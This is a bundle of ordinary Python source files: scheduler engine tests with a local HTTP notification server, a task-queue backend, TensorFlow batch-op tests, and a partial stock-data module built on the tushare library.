scheduler_test.py
|
import datetime
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import sqlite3
import threading
import time
import unittest
import myDevices.schedule as schedule
from myDevices.cloud.dbmanager import DbManager
from myDevices.cloud.scheduler import SchedulerEngine
from myDevices.utils.logger import debug, error, exception, info, setDebug, setInfo, warn
class TestClient():
def __init__(self):
info('TestClient init')
self.actions_ran = []
def RunAction(self, action):
info('RunAction: ' + action)
self.actions_ran.append(action)
return True
def SendNotification(self, notification):
info('SendNotification: ' + notification)
class TestHandler(BaseHTTPRequestHandler):
def handle_payload(self):
data = self.rfile.read(int(self.headers.get('Content-Length'))).decode('utf-8')
self.server.received.append(json.loads(data))
self.send_response(200)
self.end_headers()
def do_GET(self):
# This should match the payload in test_http_notification
self.server.received.append({'test':'GET request'})
def do_POST(self):
self.handle_payload()
def do_PUT(self):
self.handle_payload()
def do_DELETE(self):
# This should match the payload in test_http_notification
self.server.received.append({'test':'DELETE request'})
class SchedulerTest(unittest.TestCase):
def setUp(self):
self.maxDiff = None
self.test_client = TestClient()
self.test_engine = SchedulerEngine(self.test_client, 'test')
self.schedule_events = []
def tearDown(self):
self.remove_schedules()
self.test_engine.stop()
def add_schedules(self, schedule_events):
for event in schedule_events:
self.test_engine.add_scheduled_event(event, True)
self.schedule_events = self.schedule_events + schedule_events
def remove_schedules(self):
scheduled_events = {event['id']:event for event in self.schedule_events if 'id' in event}
for event in scheduled_events.values():
self.assertTrue(self.test_engine.remove_scheduled_event(event))
def check_schedules_added(self, expected):
actual = self.test_engine.get_scheduled_events()
self.assertCountEqual(expected, actual)
def check_schedules_run(self, expected, skip_jobs=()):
print('Pause to allow scheduled events to execute')
expected_to_run = [action for event in expected if event['title'] not in skip_jobs for action in event['actions']]
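# Poll for up to 70 seconds, breaking early once every expected action has run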
for i in range(70):
time.sleep(1)
if len(expected_to_run) > 0 and len(expected_to_run) == len(self.test_client.actions_ran):
break
self.assertCountEqual(expected_to_run, self.test_client.actions_ran)
def test_missing_id(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
missing_id_event = {'title':'no_id_job', 'actions':['no_id_job_action'], 'config':{'type':'date', 'start_date':start_date}}
self.assertFalse(self.test_engine.add_scheduled_event(missing_id_event, True))
self.assertFalse(self.test_engine.get_scheduled_events())
def test_overwrite_job(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'overwrite_1', 'title':'overwritten_job', 'actions':['overwritten_job_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'overwrite_1', 'title':'date_job_readd_same_id', 'actions':['date_job_readd_same_id_action'], 'config':{'type':'date', 'start_date':start_date}}]
self.add_schedules(schedule_events)
expected = [event for event in schedule_events if 'id' in event and event['title'] != 'overwritten_job']
self.check_schedules_added(expected)
def test_current_schedules(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
now = datetime.datetime.strftime(datetime.datetime.utcnow(), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'current_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'current_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config': {'type':'interval', 'unit':'day', 'interval':1, 'start_date':start_date}},
{'id':'current_3', 'title':'every_3_days_job', 'actions':['every_3_days_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':3, 'start_date':start_date}},
{'id':'current_4', 'title':'now_date_job', 'actions':['now_date_job_action'], 'config':{'type':'date', 'start_date':now}},
{'id':'current_5', 'title':'weekly_job', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':start_date}},
{'id':'current_6', 'title':'bi-weekly_job', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':2, 'start_date':start_date}},
{'id':'current_7', 'title':'every_4_months_job', 'actions':['every_4_months_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':4, 'start_date':start_date}},
{'id':'current_8', 'title':'every_3_months_job', 'actions':['every_3_months_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':3, 'start_date':now}},
{'id':'current_9', 'title':'hourly_job', 'actions':['hourly_job_action'], 'config': {'type':'interval', 'unit':'hour', 'interval':1, 'start_date':start_date}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events)
def test_past_schedules(self):
next_minute = datetime.datetime.utcnow() + datetime.timedelta(seconds=60)
passed_date = datetime.datetime.strftime(datetime.datetime.utcnow() - datetime.timedelta(seconds=120), '%Y-%m-%dT%H:%M:%S.%fZ')
one_day_ago = datetime.datetime.strftime(next_minute - datetime.timedelta(days=1), '%Y-%m-%dT%H:%M:%S.%fZ')
one_week_ago = datetime.datetime.strftime(next_minute - datetime.timedelta(days=7), '%Y-%m-%dT%H:%M:%S.%fZ')
one_month_ago = datetime.datetime.strftime(schedule.month_delta(next_minute, -1), '%Y-%m-%dT%H:%M:%S.%fZ')
one_year_ago = next_minute.replace(year=next_minute.year-1)
one_year_ago = datetime.datetime.strftime(one_year_ago, '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'past_1', 'title':'expired_date_job', 'actions':['expired_date_job_action'], 'config':{'type':'date', 'start_date':passed_date}},
{'id':'past_2', 'title':'daily_job_started_one_day_ago', 'actions':['daily_job_started_one_day_ago_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':one_day_ago}},
{'id':'past_3', 'title':'monthly_job_started_one_month_ago', 'actions':['monthly_job_started_one_month_ago_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':one_month_ago}},
{'id':'past_4', 'title':'yearly_job_started_one_year_ago', 'actions':['yearly_job_started_one_year_ago_action'], 'config':{'type':'interval', 'unit':'year', 'interval':1, 'start_date':one_year_ago}},
{'id':'past_5', 'title':'every_2_years_job_started_one_year_ago', 'actions':['every_2_years_job_started_one_year_ago_action'], 'config':{'type':'interval', 'unit':'year', 'interval':2, 'start_date':one_year_ago}},
{'id':'past_6', 'title':'weekly_job_started_one_week_ago', 'actions':['weekly_job_started_one_week_ago_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':one_week_ago}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events, ('expired_date_job', 'every_2_years_job_started_one_year_ago'))
def test_future_schedules(self):
one_day_from_now = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(days=1), '%Y-%m-%dT%H:%M:%S.%fZ')
end_of_month = datetime.datetime.strftime(datetime.datetime(2015,1,31), '%Y-%m-%dT%H:%M:%S.%fZ')
future_month = datetime.datetime.strftime(datetime.datetime(2017,12,31), '%Y-%m-%dT%H:%M:%S.%fZ')
future_year = datetime.datetime.strftime(datetime.datetime(2017,1,1), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'future_1', 'title':'daily_job_starts_one_day_from_now', 'actions':['daily_job_starts_one_day_from_now_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':one_day_from_now}},
{'id':'future_2', 'title':'end_of_month_job', 'actions':['end_of_month_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':end_of_month}},
{'id':'future_3', 'title':'future_month_job', 'actions':['future_month_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':future_month}},
{'id':'future_4', 'title':'future_year_job', 'actions':['future_year_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':future_year}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
skip_jobs = [event['title'] for event in schedule_events]
self.check_schedules_run(schedule_events, skip_jobs)
def test_reload(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'reload_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'reload_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':start_date}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events)
self.test_engine.stop()
del self.test_engine
del self.test_client
self.test_client = TestClient()
self.test_engine = SchedulerEngine(self.test_client, 'test')
for event in schedule_events:
if 'last_run' in event:
del event['last_run']
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events, ('date_job', 'daily_job'))
def test_delayed_load(self):
self.test_engine.stop()
del self.test_engine
del self.test_client
now = datetime.datetime.utcnow()
if (now.second > 35):
print('Sleep until the minute rolls over')
time.sleep(60 - now.second)
now = datetime.datetime.strftime(datetime.datetime.utcnow(), '%Y-%m-%dT%H:%M:%S.%fZ')
self.schedule_events = [{'id':'delay_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':now}},
{'id':'delay_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':now}},
{'id':'delay_3', 'title':'weekly_job', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':now}},
{'id':'delay_4', 'title':'monthly_job', 'actions':['monthly_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':now}},
{'id':'delay_5', 'title':'yearly_job', 'actions':['yearly_job_action'], 'config':{'type':'interval', 'unit':'year', 'interval':1, 'start_date':now}}]
for event in self.schedule_events:
event_json = json.dumps(event)
try:
DbManager.Insert('scheduled_events', event['id'], event_json)
except sqlite3.IntegrityError:
DbManager.Update('scheduled_events', 'event = ?', event_json, 'id = ?', event['id'])
print('Pause before loading scheduler')
time.sleep(20)
print('Starting scheduler, time is {}'.format(datetime.datetime.utcnow()))
self.test_client = TestClient()
self.test_engine = SchedulerEngine(self.test_client, 'test')
self.check_schedules_run(self.schedule_events)
def test_concurrent_updates(self):
now = datetime.datetime.strftime(datetime.datetime.utcnow(), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'concurrent_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':now}},
{'id':'concurrent_1', 'title':'date_job_updated', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':now}},
{'id':'concurrent_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':now}},
{'id':'concurrent_2', 'title':'daily_job_updated', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':now}},
{'id':'concurrent_3', 'title':'weekly_job', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':now}},
{'id':'concurrent_3', 'title':'weekly_job_updated', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':now}},
{'id':'concurrent_4', 'title':'monthly_job', 'actions':['monthly_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':now}},
{'id':'concurrent_4', 'title':'monthly_job_updated', 'actions':['monthly_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':now}},
{'id':'concurrent_5', 'title':'yearly_job', 'actions':['yearly_job_action'], 'config':{'type':'interval', 'unit':'year', 'interval':1, 'start_date':now}},
{'id':'concurrent_5', 'title':'yearly_job_updated', 'actions':['yearly_job_action'], 'config':{'type':'interval', 'unit':'year', 'interval':1, 'start_date':now}}]
for event in schedule_events:
threading.Thread(target=self.add_schedules, daemon=True, args=([event],)).start()
#Only half the schedule_events should run, since events with the same id overwrite
#previously added ones. Because the overwrite order is nondeterministic, we only
#check that one of each action has run.
run_events = {event['id']:event for event in schedule_events if 'id' in event}
skip_jobs = [event['title'] for event in run_events.values()]
self.check_schedules_run(schedule_events, skip_jobs)
def test_update_schedules(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'update_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'update_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':start_date}}]
self.add_schedules(schedule_events)
update_schedule_events = [{'id':'update_3', 'title':'date_job_full_update', 'actions':['date_job_full_update_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'update_4', 'title':'daily_job_full_update', 'actions':['daily_job_full_update_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':start_date}}]
self.assertTrue(self.test_engine.update_scheduled_events(update_schedule_events))
self.schedule_events = update_schedule_events
self.check_schedules_run(update_schedule_events)
def start_http_server(self):
self.server = HTTPServer(('localhost', 8000), TestHandler)
self.server.received = []
self.server.serve_forever()
def test_http_notification(self):
threading.Thread(target=self.start_http_server, daemon=True).start()
now = datetime.datetime.strftime(datetime.datetime.utcnow(), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'http_1', 'title':'date_get_job', 'actions':['date_job_action'],
'http_push':{'url':'http://localhost:8000', 'method':'GET', 'headers':{'Content-Type':'application/json'}, 'payload':{'test': 'GET request'}},
'config':{'type':'date', 'start_date':now}},
{'id':'http_2', 'title':'date_post_job', 'actions':['date_job_action'],
'http_push':{'url':'http://localhost:8000', 'method':'POST', 'headers':{'Content-Type':'application/json'}, 'payload':{'test': 'POST request'}},
'config':{'type':'date', 'start_date':now}},
{'id':'http_3', 'title':'date_put_job', 'actions':['date_job_action'],
'http_push':{'url':'http://localhost:8000', 'method':'PUT', 'headers':{'Content-Type':'application/json'}, 'payload':{'test': 'PUT request'}},
'config':{'type':'date', 'start_date':now}},
{'id':'http_4', 'title':'date_delete_job', 'actions':['date_job_action'],
'http_push':{'url':'http://localhost:8000', 'method':'DELETE', 'headers':{'Content-Type':'application/json'}, 'payload':{'test': 'DELETE request'}},
'config':{'type':'date', 'start_date':now}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events)
self.assertEqual(4, len(self.server.received))
expected = [event['http_push']['payload'] for event in schedule_events]
self.assertCountEqual(expected, self.server.received)
if __name__ == '__main__':
# setDebug()
setInfo()
unittest.main()
# test_suite = unittest.TestSuite()
# # test_suite.addTest(SchedulerTest('test_current_schedules'))
# # test_suite.addTest(SchedulerTest('test_future_schedules'))
# test_suite.addTest(SchedulerTest('test_reload'))
# # test_suite.addTest(SchedulerTest('test_delayed_load'))
# # test_suite.addTest(SchedulerTest('test_http_notification'))
# unittest.TextTestRunner().run(test_suite)
|
backend.py
|
import time
import pandas as pd
import multiprocessing
from task_queue import TaskQueue
import autoshape.autoshape as autoshape
import fixed_ratio.fixed_ratio as fixed_ratio
import fixed_interval.fixed_interval as fixed_interval
from re import sub
# TODO: import other tasks
class Backend:
""" backend functions"""
# TODO: add other tasks to self.tasks
def __init__(self):
self.tasks = {
'autoshape': autoshape,
'fixed_ratio': fixed_ratio,
'fixed_interval': fixed_interval,
}
self.task_queue = TaskQueue(50)
@staticmethod
def read_params():
"""
Reads parameters from parameters.csv
:return: parameters in dictionary and dataframe format
"""
params_df = pd.read_csv('parameters.csv')
params_dict = params_df.to_dict(orient='list')
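# to_dict(orient='list') maps each column to a list of values; keep only the first row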
for key in params_dict.keys():
params_dict[key] = params_dict[key][0]
return params_dict, params_df
@staticmethod
def set_params(params_df: pd.DataFrame):
"""
Writes new parameters to parameters.csv
:param params_df: New parameters dataframe
:return: None
"""
params_df.to_csv('parameters.csv', index=False)
@staticmethod
def read_output(name):
"""
Reads the output of a specified task
:param name: name of task
:return: output in dictionary and dataframe formats
"""
output_df = pd.read_csv(name + '/output.csv')
output_dict = output_df.to_dict(orient='list')
for key in output_dict.keys():
output_dict[key] = output_dict[key][0]
return output_dict, output_df
def start_task(self, params=None):
"""
Starts task specified by parameters
"""
if not params:
params = self.read_params()[0]
name = params['schedule']
length = params['session_length']
proc = multiprocessing.Process(target=self.task_process, name='task_process', args=(name, params,))
proc.start()
print(f'Task timer started: {length} seconds remaining.')
time.sleep(length)
if proc.is_alive():
print(f'Terminating task. {length} seconds elapsed.')
proc.terminate()
proc.join()
print('Task completed.')
return True
def task_process(self, name: str, params: dict):
"""
Helper method for start_task
"""
self.tasks[name].main(params)
def enqueue_task(self):
"""
Enqueues the task specified by parameters
:return: True if the task was queued successfully, False otherwise
"""
params = self.read_params()[0]
return self.task_queue.enqueue(params)
def start_queue(self):
"""
Starts the task queue, running each queued task in order
"""
for _ in range(self.task_queue.size):
self.start_task(params=self.task_queue.dequeue())
return True
def get_queue_size(self):
"""
:return: current size of task queue
"""
return self.task_queue.size
@staticmethod
def calc_func(func: str, x: int):
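# func is a math expression in x, e.g. '2x+5'; eval() resolves the local x,
# so calc_func('2x+5', 3) returns 11. Note that eval() executes arbitrary
# code, so func must come from a trusted source.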
# regex to clean up math expression
func = sub(r'(\d+|x)(x)', r'\1*\2', func)
# returns evaluated python result
return int(eval(func))
|
batch_ops_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the currently experimental in-graph batch ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from tensorflow.contrib.batching.python.ops import batch_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import script_ops
from tensorflow.python.platform import test
def delayed_plus1(x):
"""Sleeps for 100ms then returns x+1."""
time.sleep(0.1)
return x + 1
class BatchOpsTest(test.TestCase):
"""Tests for batch_ops.{un,}batch."""
def testBasicBatch(self):
"""Tests that a single batched tensor executes together and only once."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, index, _ = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=2,
batch_timeout_micros=36000000, grad_timeout_micros=0,
batching_queue="")
thread_results = []
def worker():
thread_results.extend(
sess.run([batched, index], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([batched, index], feed_dict={inp: [2]})
worker_thread.join()
# At this point either the thread or the main did the batch and the other
# should have empty results.
if list(thread_results[0][0]):
batch_t = thread_results[0][0]
index_t = thread_results[1]
empty_b = main_results[0][0]
empty_m = main_results[1]
else:
batch_t = main_results[0][0]
index_t = main_results[1]
empty_b = thread_results[0][0]
empty_m = thread_results[1]
# Check that both the inputs made it out exactly once.
self.assertAllEqual(sorted(batch_t), (1, 2))
# Check that we get 2 rows in the index tensor.
self.assertEqual(len(index_t), 2)
# Check that the other ones are empty.
self.assertEqual(len(empty_b), 0)
self.assertEqual(len(empty_m), 0)
def testBatchWithPadding(self):
"""Test that batching with padding up to an allowed batch size works."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[2])
batched, index, _ = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=10,
batch_timeout_micros=100000, # 100ms
allowed_batch_sizes=[5, 10],
grad_timeout_micros=0, batching_queue="")
thread_results = []
def worker():
thread_results.extend(
sess.run([batched, index], feed_dict={inp: [1, 3]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([batched, index], feed_dict={inp: [2, 4]})
worker_thread.join()
# At this point either the thread or the main did the batch and the other
# should have empty results.
if list(thread_results[0][0]):
batch_t = thread_results[0][0]
else:
batch_t = main_results[0][0]
# Check that the batch tensor incorporates the padding.
self.assertEqual(len(batch_t), 5)
def testMultipleBatch(self):
"""Tests that multiple batched tensors execute together."""
with self.test_session() as sess:
inp0 = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
inp1 = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, _, _ = batch_ops.batch(
[inp0, inp1],
num_batch_threads=1,
max_batch_size=2,
batch_timeout_micros=36000000,
grad_timeout_micros=0,
batching_queue="")
thread_results = []
def worker():
thread_results.extend(
sess.run([batched], feed_dict={inp0: [1],
inp1: [2]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([batched], feed_dict={inp0: [2], inp1: [3]})
worker_thread.join()
# At this point either the thread or the main did the batch and the other
# should have empty results.
if list(thread_results[0][0]):
batch_t = thread_results[0]
empty_t = main_results[0]
else:
batch_t = main_results[0]
empty_t = thread_results[0]
# Assert that the tensors were batched together.
self.assertAllEqual(sorted(batch_t[0]), [1, 2])
self.assertAllEqual(sorted(batch_t[1]), [2, 3])
self.assertAllEqual(empty_t[0], [])
self.assertAllEqual(empty_t[1], [])
def testIllegalBatchDifferentDim0Sizes(self):
"""Tests illegally feeding tensors with different dim0 sizes."""
with self.test_session() as sess:
inp0 = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
inp1 = array_ops.placeholder(dtype=dtypes.int32, shape=[2])
batched, index, _ = batch_ops.batch(
[inp0, inp1], num_batch_threads=1, max_batch_size=2,
batch_timeout_micros=0, grad_timeout_micros=0, batching_queue="")
with self.assertRaises(Exception) as raised:
_ = sess.run([batched, index], feed_dict={inp0: [0], inp1: [1, 2]})
self.assertGreater(
raised.exception.message.find("must have equal 0th-dimension size"),
0)
def testBasicUnbatch(self):
"""Tests that batch and unbatch work together."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, index, id_t = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=10,
batch_timeout_micros=100000, # 100ms
allowed_batch_sizes=[3, 10],
grad_timeout_micros=0, batching_queue="")
computation = batched[0] + 1
result = batch_ops.unbatch(computation, index, id_t,
timeout_micros=1000000, shared_name="unbatch")
thread_results = []
def worker():
thread_results.extend(sess.run([result], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([result], feed_dict={inp: [2]})
worker_thread.join()
self.assertEqual(thread_results[0], [2])
self.assertEqual(main_results[0], [3])
def testBasicUnbatchDecorated(self):
"""Tests that the batch_function decorator works."""
with self.test_session() as sess:
@batch_ops.batch_function(1, 10, 100000)
def computation(in_t):
return in_t + 1
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
result = computation(inp)
thread_results = []
def worker():
thread_results.extend(sess.run([result], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([result], feed_dict={inp: [2]})
worker_thread.join()
self.assertEqual(thread_results[0], [2])
self.assertEqual(main_results[0], [3])
def testUnbatchTimeout(self):
"""Tests that the unbatch timeout works."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, index, id_t = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=2,
batch_timeout_micros=36000000, grad_timeout_micros=0,
batching_queue="")
computation = batched[0] + 1
timeout_micros = 10
result = batch_ops.unbatch(computation, index, id_t, timeout_micros,
shared_name="shared_unbatch")
# Set up a parallel pipeline that delays the computation, but uses the
# same unbatch resource object as the non-delayed pipeline.
computation_delayed = script_ops.py_func(delayed_plus1,
[batched[0]],
dtypes.int32)
result_delayed = batch_ops.unbatch(computation_delayed,
index,
id_t,
timeout_micros,
shared_name="shared_unbatch")
thread_results = []
def worker():
# A first call using the non-delayed pipeline. The batcher will send an
# empty tensor along the non-delayed pipeline.
thread_results.extend(sess.run([result], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
time.sleep(0.1) # Ensure the thread's call starts first.
# A second call using the delayed pipeline. The batcher will send the
# batched tensor along the delayed pipeline, thus delaying the arrival of
# the batched tensor at the unbatch op, relative to the empty tensor.
#
# TODO(olston, apassos): Avoid relying on the order in which the batch op
# emits the empty tensor versus the batched one.
_ = sess.run([result_delayed], feed_dict={inp: [2]})
worker_thread.join()
# The thread's call should hit the timeout, and thus get 0 results.
self.assertEqual(len(thread_results), 0)
def testUnbatchGrad(self):
"""Tests that batch and unbatch are differentiable."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, index, id_t = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=2,
batch_timeout_micros=36000000, grad_timeout_micros=1000000,
batching_queue="")
computation = batched[0] * batched[0]
result = batch_ops.unbatch(computation, index, id_t,
timeout_micros=1000000, shared_name="unbatch")
grad = gradients_impl.gradients(result, inp)
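# d(x*x)/dx = 2x, so feeding [1] and [2] should yield gradients [2] and [4]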
thread_results = []
def worker():
thread_results.extend(sess.run([grad], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([grad], feed_dict={inp: [2]})
worker_thread.join()
self.assertEqual(thread_results[0], [2])
self.assertEqual(main_results[0], [4])
if __name__ == "__main__":
test.main()
|
DataBaseModule.py
|
import tushare as ts
#import os
import pandas as pd
#import time
#import threading
import datetime as dtime
class DataBase:
updateAllShareHistoryDataSum = 0
updateAllShareHistoryDataCount = 0
indexNameMap = {'hs300':399300}
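# maps index names to market data codes; 399300 is the Shenzhen exchange code for the CSI 300 (hs300) index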
store = None
"""===============================公有函数========================="""
"""
Get the list of CSI 300 (hs300) constituent stocks, sorted by weight in descending order
"""
def get_hs300_sharelist(self):
return self.store["hs300_share_list"]
"""
Update history data for all stocks
"""
def update_all_share_history_data(self):
self.__log("update all share history data");
self.__update_share_list_from_internet()
data = self.get_share_list_form_local()
#drop all stocks that have not yet listed (timeToMarket == 0)
data = data[data.timeToMarket != 0]
dataCodes = list(data.index)
for key in self.indexNameMap:
#print(self.indexNameMap[key])
dataCodes.append(self.indexNameMap[key])
#print(dataCodes)
self.updateAllShareHistoryDataSum = len(dataCodes)
#data1 = dataCodes[0:int(self.updateAllShareHistoryDataSum/2)]
#data2 = dataCodes[int(self.updateAllShareHistoryDataSum/2):]
#threading.Thread(target=self.__update_share_history_data_by_codes,args=([data1])).start()
#threading.Thread(target=self.__update_share_history_data_by_codes,args=([data2])).start()
self.__update_share_history_data_by_codes(dataCodes)
"""
Get data for a single stock: prefer local data if present; if there is none, update first and then read the local store
"""
def get_share_history_data(self,code,startDate=None,endDate=None):
data = self.store.select('share_'+str(code))
if not isinstance(data,pd.DataFrame):
return None
#data = data.iloc[::-1]
data.index = data.date
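#index by the date column so the label-based slices below select inclusive date ranges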
if startDate is None and endDate is None:
return data
elif startDate is not None and endDate is None:
return data[startDate:startDate]
else:
return data[startDate:endDate]
"""
if startDate is None and endDate is None:
data = self.store.select('share_'+str(code))
data = data.iloc[::-1]
data.index = data.date
if not isinstance(data,pd.DataFrame):
return None
else:
return data
else:
topData = self.store.select('share_'+str(code),start=0,stop=1)
print(topData)
"""
def debug_get_share_history_data(self,code,startDate=None,endDate=None):
try:
if startDate is None and endDate is None:
data = self.store.select('share_'+str(code))
data = data.iloc[::-1]
data.index = data.date
if not isinstance(data,pd.DataFrame):
return None
else:
return data
else:
topData = self.store.select('share_'+str(code),start=0,stop=1)
print(topData)
"""
if topData.empty:
print("start data is emmpty code="+str(code))
return None
topDateStr = topData.index[0]
topDateObj = dtime.datetime.strptime(topDateStr,"%Y-%m-%d")
startDateObj = dtime.datetime.strptime(startDate,"%Y-%m-%d")
del_time = topDateObj - startDateObj
if del_time.days <=0:
start = 0
else:
start = int(del_time.days*0.5)
if endDate is None:
stop = start+10
else:
endDateObj = dtime.datetime.strptime(endDate,"%Y-%m-%d")
del_time2 = startDateObj - endDateObj
stop = int(del_time2.days+3)+start
#print(start)
#print(stop)
data = self.store.select('share_'+str(code),start=start,stop=stop)
if not isinstance(data,pd.DataFrame):
print("data is not dataframe code="+str(code)+" ["+str(start)+" "+str(stop)+"]")
return None
else:
#print(data)
if endDate is None:
ret_data = data.loc[startDate:startDate]
else:
ret_data = data.loc[startDate:endDate]
if ret_data is None or ret_data.empty:
print("DataBase is None or empty"+" code="+str(code)+" ["+startDate+" "+endDate+"]")
return ret_data
"""
except Exception as e:
print(" get_share_history_data except code="+str(code)+" e="+str(e))
return None
"""
Get CSI 300 (hs300) index data
"""
def get_hs300_data(self):
return self.get_share_history_data(self.indexNameMap['hs300'])
"""
Update history data for a single stock
"""
def update_share_history_data(self,codestr):
code = self.__formatInputCode(codestr)
self.__log("update data from internet code="+code)
data = ts.get_k_data(code)
if isinstance(data,pd.DataFrame) and not data.empty:
self.store['share_'+code] = data
else:
self.store['share_'+code] = pd.DataFrame()
self.__log("update data from internet code="+code+" but not get data")
"""
Get the list of stock names, codes, and other basic info
"""
def get_share_list_form_local(self):
return self.store['all_share_list']
def update_all_report_data(self):
timeset = self.__get_Q_list()
for time in timeset:
self.__update_report_data(time[0],time[1])
def update_all(self):
self.__update_hs300_sharelist()
self.update_all_share_history_data()
self.store.close()
"""==================================私有函数============================"""
def __date_to_q(self,date):
tmp = date.split('-')
q = 1
if tmp[1] in ['01','02','03']:
q = 1
elif tmp[1] in ['04','05','06']:
q = 2
elif tmp[1] in ['07','08','09']:
q = 3
else:
q = 4
return (int(tmp[0]),q)
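# e.g. __date_to_q('2017-05') -> (2017, 2): maps a 'YYYY-MM' string to (year, quarter)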
def __get_Q_list(self):
